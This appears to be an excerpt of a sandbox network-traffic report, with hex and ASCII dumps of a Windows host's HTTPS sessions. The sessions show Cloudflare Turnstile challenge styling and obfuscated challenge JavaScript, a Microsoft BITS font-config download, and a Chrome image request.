2024-04-24 13:24:12 UTC	1369	IN	Data Raw: 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 Data Ascii: lenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .ctp-checkbox-label .mark { border: 2px solid #dadada; background-color: #222;}.theme-dark .ctp-checkbox-label input:focus ~ .mark, .theme-dark .c
2024-04-24 13:24:12 UTC	1341	IN	Data Raw: 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 Data Ascii: rder-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .th
2024-04-24 13:24:12 UTC	1369	IN	Data Raw: 31 62 35 37 0d 0a 69 6e 64 65 78 3a 20 39 39 39 39 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d Data Ascii: 1b57index: 9999; background-color: #fafafa;}#challenge-overlay,#challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-
2024-04-24 13:24:12 UTC	1369	IN	Data Raw: 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 73 70 61 6e 2e 63 74 70 2d 6c 61 62 65 6c 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 Data Ascii: ;}.ctp-checkbox-label input:active ~ .mark { border: 2px solid #c44d0e;}.ctp-checkbox-label input:active ~ span.ctp-label { text-decoration: underline;}.ctp-checkbox-label input:focus ~ .mark { border: 2px solid #c44d0e;}.ctp-checkbox-label
2024-04-24 13:24:12 UTC	1369	IN	Data Raw: 69 67 68 74 3a 20 31 31 38 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 32 70 78 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 Data Ascii: ight: 118px;}.size-compact .link-spacer { margin-right: 3px; margin-left: 3px;}.size-compact .ctp-checkbox-container { text-align: left;}.size-compact #logo { margin-top: 5px; margin-bottom: 0; height: 22px;}.size-compact .cb-container
2024-04-24 13:24:12 UTC	1369	IN	Data Raw: 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 32 35 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 63 6f 6e 2c 0a 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 32 35 35 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 30 20 31 36 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 20 20 Data Ascii: ; margin-left: 8px;}.rtl #spinner-icon { left: 255px; margin-left: 8px;}.rtl #timeout-icon,.rtl #expired-icon { left: 255px; margin-left: 8px;}.rtl #branding { margin: 0 0 0 16px; padding-right: 0; padding-left: 0; width: 90px;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	23.206.6.29	443

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:12 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-24 13:24:12 UTC	531	IN	HTTP/1.1 200 OK Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Content-Type: application/octet-stream ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0Fz4RYwAAAACZW8dCTzveR7lI76J6Z2l5U0pDRURHRTA1MTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=236369 Date: Wed, 24 Apr 2024 13:24:12 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-24 13:24:12 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:12 UTC	710	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=879669880fea0acd HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:13 UTC	358	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:12 GMT Content-Type: application/javascript; charset=UTF-8 Transfer-Encoding: chunked Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 vary: accept-encoding Server: cloudflare CF-RAY: 8796698ccba709f1-LAS alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:13 UTC	287	IN	Data Raw: 31 31 38 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 78 2c 66 45 2c 66 46 2c 66 47 2c 66 4b 2c 66 4e 2c 66 4f 2c 67 65 2c 67 66 2c 67 6a 2c 67 6b 2c 67 72 2c 67 79 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c 68 67 2c 68 68 2c 68 69 2c 68 6a 2c 68 6b 2c 68 6c 2c 68 6d 2c 68 6e 2c 68 6f 2c 68 70 2c 68 71 2c 68 72 2c 68 73 2c 68 74 2c 68 75 2c 68 Data Ascii: 118window._cf_chl_opt.uaO=false;~function(ix,fE,fF,fG,fK,fN,fO,ge,gf,gj,gk,gr,gy,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,hg,hh,hi,hj,hk,hl,hm,hn,ho,hp,hq,hr,hs,ht,hu,h
2024-04-24 13:24:13 UTC	1369	IN	Data Raw: 31 65 35 30 0d 0a 4d 29 7b 66 6f 72 28 69 78 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 69 77 2c 65 2c 66 29 7b 66 6f 72 28 69 77 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 69 77 28 31 38 38 39 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 69 77 28 32 33 35 35 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 69 77 28 32 30 37 30 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 69 77 28 35 31 37 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 69 77 28 31 37 34 34 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 69 77 28 36 31 32 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 69 77 28 31 38 35 39 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 69 77 28 31 31 31 33 29 29 2f 38 29 2b 70 61 72 73 65 49 6e 74 Data Ascii: 1e50M){for(ix=b,function(c,d,iw,e,f){for(iw=b,e=c();!![];)try{if(f=-parseInt(iw(1889))/1(parseInt(iw(2355))/2)+parseInt(iw(2070))/3(parseInt(iw(517))/4)+-parseInt(iw(1744))/5(parseInt(iw(612))/6)+-parseInt(iw(1859))/7(-parseInt(iw(1113))/8)+parseInt
2024-04-24 13:24:13 UTC	1369	IN	Data Raw: 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 44 77 78 79 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 65 45 6a 57 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6a 70 5a 71 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 53 41 73 4c 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 51 55 6d 73 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 45 48 73 43 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 6d 63 72 53 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 Data Ascii: ,i){return h<i},'Dwxyk':function(h,i){return i&h},'eEjWL':function(h,i){return h<i},'jpZqQ':function(h,i){return h-i},'SAsLc':function(h,i){return h(i)},'QUmsC':function(h,i){return i\|h},'EHsCV':function(h,i){return h<<i},'mcrSs':function(h,i){return i==h
2024-04-24 13:24:13 UTC	1369	IN	Data Raw: 34 29 5d 28 64 5b 69 50 28 38 32 39 29 5d 2c 69 50 28 32 33 36 33 29 29 29 7b 69 66 28 4c 3d 69 5b 69 50 28 33 30 39 31 29 5d 28 4b 29 2c 4f 62 6a 65 63 74 5b 69 50 28 32 36 30 33 29 5d 5b 69 50 28 31 39 34 34 29 5d 5b 69 50 28 31 39 31 34 29 5d 28 42 2c 4c 29 7c 7c 28 42 5b 4c 5d 3d 46 2b 2b 2c 43 5b 4c 5d 3d 21 30 29 2c 4d 3d 44 2b 4c 2c 4f 62 6a 65 63 74 5b 69 50 28 32 36 30 33 29 5d 5b 69 50 28 31 39 34 34 29 5d 5b 69 50 28 31 39 31 34 29 5d 28 42 2c 4d 29 29 44 3d 4d 3b 65 6c 73 65 20 69 66 28 69 50 28 32 33 38 36 29 21 3d 3d 69 50 28 31 35 35 34 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 69 50 28 32 36 30 33 29 5d 5b 69 50 28 31 39 34 34 29 5d 5b 69 50 28 31 39 31 34 29 5d 28 43 2c 44 29 29 7b 69 66 28 64 5b 69 50 28 31 31 37 38 29 5d 28 32 35 36 2c 44 Data Ascii: 4)](d[iP(829)],iP(2363))){if(L=i[iP(3091)](K),Object[iP(2603)][iP(1944)][iP(1914)](B,L)\|\|(B[L]=F++,C[L]=!0),M=D+L,Object[iP(2603)][iP(1944)][iP(1914)](B,M))D=M;else if(iP(2386)!==iP(1554)){if(Object[iP(2603)][iP(1944)][iP(1914)](C,D)){if(d[iP(1178)](256,D
2024-04-24 13:24:13 UTC	1369	IN	Data Raw: 78 3d 30 3b 78 3c 47 3b 49 3d 4e 7c 49 3c 3c 31 2e 36 37 2c 64 5b 69 50 28 31 32 37 32 29 5d 28 4a 2c 64 5b 69 50 28 32 37 35 30 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 50 28 31 30 35 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 50 28 31 37 35 38 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 69 50 28 31 31 37 38 29 5d 28 31 36 2c 78 29 3b 49 3d 64 5b 69 50 28 33 31 37 35 29 5d 28 49 2c 31 29 7c 4e 26 31 2e 37 35 2c 64 5b 69 50 28 32 32 36 32 29 5d 28 4a 2c 64 5b 69 50 28 32 37 35 30 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 50 28 31 30 35 33 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 64 5b 69 50 28 32 32 36 32 29 5d 28 30 Data Ascii: x=0;x<G;I=N\|I<<1.67,d[iP(1272)](J,d[iP(2750)](j,1))?(J=0,H[iP(1053)](o(I)),I=0):J++,N=0,x++);for(N=D[iP(1758)](0),x=0;d[iP(1178)](16,x);I=d[iP(3175)](I,1)\|N&1.75,d[iP(2262)](J,d[iP(2750)](j,1))?(J=0,H[iP(1053)](o(I)),I=0):J++,N>>=1,x++);}E--,d[iP(2262)](0
2024-04-24 13:24:13 UTC	1369	IN	Data Raw: 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 54 28 31 37 35 33 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 64 5b 69 54 28 32 30 34 30 29 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 54 28 31 38 39 34 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 54 28 31 37 35 33 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 69 54 28 33 30 31 33 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 69 54 28 32 38 39 33 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 54 28 31 35 38 35 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c Data Ascii: J=0,K=Math[iT(1753)](2,C),F=1;d[iT(2040)](F,K);L=H&G,H>>=1,H==0&&(H=j,G=o(I++)),J\|=d[iT(1894)](0<L?1:0,F),F<<=1);switch(M=J){case 0:for(J=0,K=Math[iT(1753)](2,8),F=1;d[iT(3013)](F,K);L=d[iT(2893)](G,H),H>>=1,0==H&&(H=j,G=o(I++)),J\|=d[iT(1585)](0<L?1:0,F),
2024-04-24 13:24:13 UTC	923	IN	Data Raw: 75 28 31 38 31 39 29 5d 5b 6a 75 28 31 34 34 30 29 5d 26 26 28 78 3d 78 5b 6a 75 28 32 30 31 31 29 5d 28 67 5b 6a 75 28 31 38 31 39 29 5d 5b 6a 75 28 31 34 34 30 29 5d 28 68 29 29 29 2c 78 3d 67 5b 6a 75 28 31 35 37 35 29 5d 5b 6a 75 28 31 33 30 39 29 5d 26 26 67 5b 6a 75 28 31 32 37 34 29 5d 3f 67 5b 6a 75 28 31 35 37 35 29 5d 5b 6a 75 28 31 33 30 39 29 5d 28 6e 65 77 20 67 5b 28 6a 75 28 31 32 37 34 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 6a 77 2c 48 29 7b 66 6f 72 28 6a 77 3d 6a 75 2c 47 5b 6a 77 28 32 34 37 34 29 5d 28 29 2c 48 3d 30 3b 6f 5b 6a 77 28 39 32 37 29 5d 28 48 2c 47 5b 6a 77 28 31 32 36 33 29 5d 29 3b 47 5b 48 2b 31 5d 3d 3d 3d 47 5b 48 5d 3f 47 5b 6a 77 28 31 35 31 32 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 Data Ascii: u(1819)][ju(1440)]&&(x=x[ju(2011)](g[ju(1819)][ju(1440)](h))),x=g[ju(1575)][ju(1309)]&&g[ju(1274)]?g[ju(1575)][ju(1309)](new g[(ju(1274))](x)):function(G,jw,H){for(jw=ju,G[jw(2474)](),H=0;o[jw(927)](H,G[jw(1263)]);G[H+1]===G[H]?G[jw(1512)](H+1,1):H+=1);re
2024-04-24 13:24:13 UTC	1369	IN	Data Raw: 32 30 34 34 0d 0a 73 2b 76 7d 2c 6a 5b 6a 78 28 31 33 34 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c 76 7d 2c 6a 5b 6a 78 28 31 35 31 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 3d 3d 3d 73 7d 2c 6b 3d 6a 2c 6c 3d 4f 62 6a 65 63 74 5b 6a 78 28 33 33 30 32 29 5d 28 69 29 2c 6d 3d 30 3b 6b 5b 6a 78 28 31 33 34 30 29 5d 28 6d 2c 6c 5b 6a 78 28 31 32 36 33 29 5d 29 3b 6d 2b 2b 29 69 66 28 6e 3d 6c 5b 6d 5d 2c 6b 5b 6a 78 28 31 35 31 31 29 5d 28 27 66 27 2c 6e 29 26 26 28 6e 3d 27 4e 27 29 2c 68 5b 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6f 3c 69 5b 6c 5b 6d 5d 5d 5b 6a 78 28 31 32 36 33 29 5d 3b 2d 31 3d 3d 3d 68 5b 6e 5d 5b 6a 78 28 36 30 32 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 26 26 28 Data Ascii: 2044s+v},j[jx(1340)]=function(s,v){return s<v},j[jx(1511)]=function(s,v){return v===s},k=j,l=Object[jx(3302)](i),m=0;k[jx(1340)](m,l[jx(1263)]);m++)if(n=l[m],k[jx(1511)]('f',n)&&(n='N'),h[n]){for(o=0;o<i[l[m]][jx(1263)];-1===h[n][jx(602)](i[l[m]][o])&&(
2024-04-24 13:24:13 UTC	1369	IN	Data Raw: 68 28 6b 5b 6c 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6d 3d 66 4b 5b 6b 39 28 31 33 34 34 29 5d 28 42 29 5b 6b 39 28 38 30 35 29 5d 28 27 2b 27 2c 6b 39 28 32 30 37 32 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 6e 3d 6e 65 77 20 66 45 5b 28 6b 39 28 37 36 36 29 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 6e 5b 6b 39 28 31 33 30 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 6e 5b 6b 39 28 32 37 30 34 29 5d 28 6a 5b 6b 39 28 31 37 32 35 29 5d 28 27 76 5f 27 2b 66 45 5b 6b 39 28 32 37 36 34 29 5d 5b 6b 39 28 31 30 39 36 29 5d 2c 27 3d 27 29 2b 6d 29 3b 63 6f 6e 74 69 6e 75 65 Data Ascii: h(k[l++]){case'0':m=fK[k9(1344)](B)[k9(805)]('+',k9(2072));continue;case'1':n=new fE[(k9(766))]();continue;case'2':if(!n)return;continue;case'3':n[k9(1307)]=function(){};continue;case'4':n[k9(2704)](j[k9(1725)]('v_'+fE[k9(2764)][k9(1096)],'=')+m);continue
2024-04-24 13:24:13 UTC	1369	IN	Data Raw: 2c 67 79 3d 7b 7d 2c 67 79 5b 69 78 28 31 34 35 36 29 5d 3d 67 78 2c 66 45 5b 69 78 28 34 39 31 29 5d 3d 67 79 2c 67 41 3d 7b 7d 2c 67 41 5b 69 78 28 32 34 30 30 29 5d 3d 69 78 28 31 39 31 33 29 2c 67 41 5b 69 78 28 33 32 37 35 29 5d 3d 69 78 28 31 39 30 35 29 2c 67 41 5b 69 78 28 32 39 38 30 29 5d 3d 69 78 28 32 36 32 35 29 2c 67 41 5b 69 78 28 33 32 35 39 29 5d 3d 69 78 28 32 38 36 38 29 2c 67 41 5b 69 78 28 32 36 39 37 29 5d 3d 69 78 28 32 30 31 38 29 2c 67 41 5b 69 78 28 31 33 33 33 29 5d 3d 69 78 28 32 35 36 37 29 2c 67 41 5b 69 78 28 31 38 36 32 29 5d 3d 69 78 28 31 32 34 35 29 2c 67 41 5b 69 78 28 32 33 36 35 29 5d 3d 69 78 28 33 31 32 35 29 2c 67 41 5b 69 78 28 31 35 31 39 29 5d 3d 69 78 28 33 32 36 37 29 2c 67 41 5b 69 78 28 31 36 36 32 29 5d 3d Data Ascii: ,gy={},gy[ix(1456)]=gx,fE[ix(491)]=gy,gA={},gA[ix(2400)]=ix(1913),gA[ix(3275)]=ix(1905),gA[ix(2980)]=ix(2625),gA[ix(3259)]=ix(2868),gA[ix(2697)]=ix(2018),gA[ix(1333)]=ix(2567),gA[ix(1862)]=ix(1245),gA[ix(2365)]=ix(3125),gA[ix(1519)]=ix(3267),gA[ix(1662)]=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	104.17.3.184	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:12 UTC	785	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/vtjpx/0x4AAAAAAAX1FyqfrSUlMHQ3/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
